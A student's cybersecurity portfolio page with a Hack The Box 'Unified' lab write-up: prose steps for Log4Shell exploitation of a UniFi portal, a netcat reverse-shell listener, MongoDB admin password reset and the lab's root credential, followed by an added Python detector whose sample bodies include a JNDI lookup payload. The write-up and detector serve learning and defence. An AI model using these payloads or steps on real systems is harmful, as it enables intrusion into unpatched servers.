Cybersecurity Student

Final-year BSc (Hons) Cyber Security at Sheffield Hallam University. I've made a blog to track my journey and help other people, focusing on penetration testing, DFIR, and secure network administration.

Penetration Testing, DFIR, Threat Intelligence, Secure Network Admin

About Me

Hi, I'm Taylor 👋

I'm a final-year Cyber Security student passionate about penetration testing, digital forensics, and secure systems. I document my progress through projects, write‑ups, and Hack The Box labs. Currently completing my final year at Sheffield Hallam University, I continue to sharpen my skills and share insights to help others on a similar journey.

Sheffield Hallam University, Hack The Box

Projects

Hands-on technical and consultancy projects from my degree and personal work.

CyberFirst Educational Game Project

Collaborated with CyberFirst to digitise a physical Enigma-based education game. Built a game in Unity teaching Morse, Caesar, and Enigma principles; presented to 200+ students and industry guests.

Education, Cryptography, Teamwork

Threat Intelligence Brief — UK Gov (BEIS)

Delivered a consultancy-style threat intel report using OSINT and MITRE ATT&CK, profiling threat actor TTPs targeting the education sector and producing recommendations for SOC operations.

Threat Intel, OSINT, MITRE ATT&CK

Secure Network Services Lab

Deployed hybrid Windows/Linux infrastructure with ADDS, DNS, DHCP and Group Policy. Configured Cisco routing & switching (VLANs, ACLs, OSPF with MD5) for enterprise‑style security.

Networking, Active Directory, Cisco

Ethical Hacking & DFIR Labs

Exploited Apache Tika RCE and AlwaysInstallElevated misconfig to escalate privileges; analysed PCAPs in Wireshark/Security Onion to detect suspicious malware.

Pentesting, DFIR, Wireshark

Certifications & Skills

Core certifications (earned & in progress) and technical skills.

CREST CPSA/CRT (studying), Penetration Testing, DFIR, Threat Intelligence, Active Directory, Cisco Networking, Nmap, Burp Suite, Wireshark, Security Onion, Packet Tracer, Python, Linux

Timeline

2023 – Present — BSc (Hons) Cyber Security

Sheffield Hallam University • Final-year student averaging a 2:1. Modules include Ethical Hacking, Secure Network Admin, Database Security, and Project‑Based Learning.

2025 — CyberFirst Educational Game

Built an interactive cryptography experience teaching Enigma, Caesar cipher, and Morse code; delivered to secondary school students.

2024 — Threat Intelligence Brief

Produced a GOV client report using OSINT and MITRE ATT&CK, focused on threats to the education sector.

2024 — Secure Network Services

Configured Windows/Linux services (ADDS, DNS, DHCP, GPO) and Cisco networking (VLANs, ACLs, OSPF MD5).

2024 — Ethical Hacking & DFIR

Assessment labs covering exploitation (Apache Tika RCE, AlwaysInstallElevated) and network forensics (DarkGate indicators, IoT scanning).

Recommendations

Ben McIvor

Head of Computing and Online Safety at Kings Priory School, CyberFirst Operations Lead for North East and Yorkshire, COO Kings Priory Digital

I had the pleasure of working with Taylor on a fantastic project where he and his team digitised the already fascinating experience of Operation Enigma for secondary school pupils. As part of the team, Taylor played a key role in transforming this historic topic into an engaging and interactive digital format that captured students’ interest and curiosity.

Throughout the project, Taylor demonstrated excellent teamwork, creativity, and technical skill. He worked collaboratively to ensure the final product was both educational and accessible, showing real initiative in overcoming challenges and enhancing the user experience.

What impressed me most was Taylor’s ability to balance the technical aspects of the project with a strong understanding of the audience, ensuring that the digitised experience not only communicated the historical significance of Operation Enigma but also inspired and excited the students who engaged with it.

Blog

4th October 2025 — HTB: Unified (Tier 2) Write-up

Today I set up this website to track my cybersecurity journey. I'm currently working through all Hack The Box Starting Point tiers (Tier 0, Tier 1, and Tier 2). On this day, I completed the Tier 2 lab called Unified. Below is a detailed summary of how I completed it:

Step 1: Start & Connect

I launched the machine, connected via the VPN, and verified connectivity by pinging the target IP.

Step 2: Reconnaissance

Initially, browsing to the IP gave nothing, so I ran an nmap -A scan. This revealed ports 22, 6789, 8080, and 8443 open. On port 8443 I found a UniFi login portal.

Step 3: Research Vulnerability

Based on the UniFi version, I found it was vulnerable to Log4Shell (CVE-2021-44228). This affects the remember parameter in login requests.

Step 4: Testing the Vulnerability

Using Burp Suite, I intercepted a login request, modified the remember parameter with a JNDI payload, and confirmed the target attempted an LDAP lookup to my controlled host (visible in tcpdump).

Step 5: Exploitation

I set up RogueJNDI and crafted a Base64‑encoded Bash reverse shell payload. After starting a listener with nc -lvp 4444, I triggered the exploit and received a reverse shell on the target.

Step 6: User Flag

Enumerating the filesystem, I located and captured the user.txt flag in Michael’s home directory.

Step 7: Privilege Escalation

Checking running processes revealed MongoDB on port 27117. The UniFi application stores credentials in the ace database. I updated the admin password to Password1234 using Mongo commands, then re‑hashed it with SHA‑512 to match the format. This allowed me to log into the UniFi admin dashboard in the browser.

Step 8: Root Flag

From the dashboard, I found SSH credentials: root:NotACrackablePassword4U2022. Using SSH I logged in as root and captured the final root.txt flag.

This challenge taught me a lot about exploiting Log4j (Log4Shell), using RogueJNDI, and leveraging MongoDB to escalate privileges. It was a solid Tier 2 box combining reconnaissance, web exploitation, and post‑exploitation skills.

Hack The Box, Starting Point, Unified, Log4Shell, Writeup
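
Added example, not part of the original write-up: a defender-side check for the login requests described in Step 4. It assumes the UniFi login body is JSON with a boolean remember field; the function names and sample bodies are constructed for illustration.

```python
import json

# Assumption: the UniFi login body is JSON with a boolean "remember" field,
# e.g. {"username": "...", "password": "...", "remember": true}.
LOOKUP_OPEN = "${"  # start of any Log4j lookup expression, nested or not


def _strings(value, path=""):
    """Yield (path, text) for every string nested anywhere in a JSON value."""
    if isinstance(value, str):
        yield path, value
    elif isinstance(value, dict):
        for key, item in value.items():
            yield from _strings(item, f"{path}.{key}" if path else key)
    elif isinstance(value, list):
        for index, item in enumerate(value):
            yield from _strings(item, f"{path}[{index}]")


def inspect_login_body(raw):
    """Return a list of findings for one captured login request body."""
    try:
        body = json.loads(raw)
    except json.JSONDecodeError:
        return ["body is not valid JSON"]
    if not isinstance(body, dict):
        return ["body is not a JSON object"]
    findings = []
    # A type check catches every payload placed in "remember", however encoded.
    if "remember" in body and not isinstance(body["remember"], bool):
        findings.append("remember is not a boolean")
    # Lookup syntax has no business in any credential field either.
    for path, text in _strings(body):
        if LOOKUP_OPEN in text:
            findings.append(f"lookup syntax in {path}")
    return findings


# Constructed sample bodies (not captured traffic); 192.0.2.10 is a documentation address.
SAMPLES = [
    '{"username": "admin", "password": "hunter2", "remember": true}',
    '{"username": "admin", "password": "x", "remember": "${jndi:ldap://192.0.2.10:1389/a}"}',
    '{"username": "${env:USER}", "password": "x", "remember": false}',
    '{"username": "admin", "password": "x", "remember": {"a": ["${date:yyyy}"]}}',
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(inspect_login_body(sample) or "clean", "<-", sample)
```

Because the type check does not depend on matching the payload text, it still fires when the lookup string is nested or encoded in ways a signature would miss.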

Contact

This form sends straight to my ProtonMail inbox (no email app opens).

If you see any issues, you can still email me directly at taylorbetreenn@protonmail.com

PGP Public Key (for encrypted email)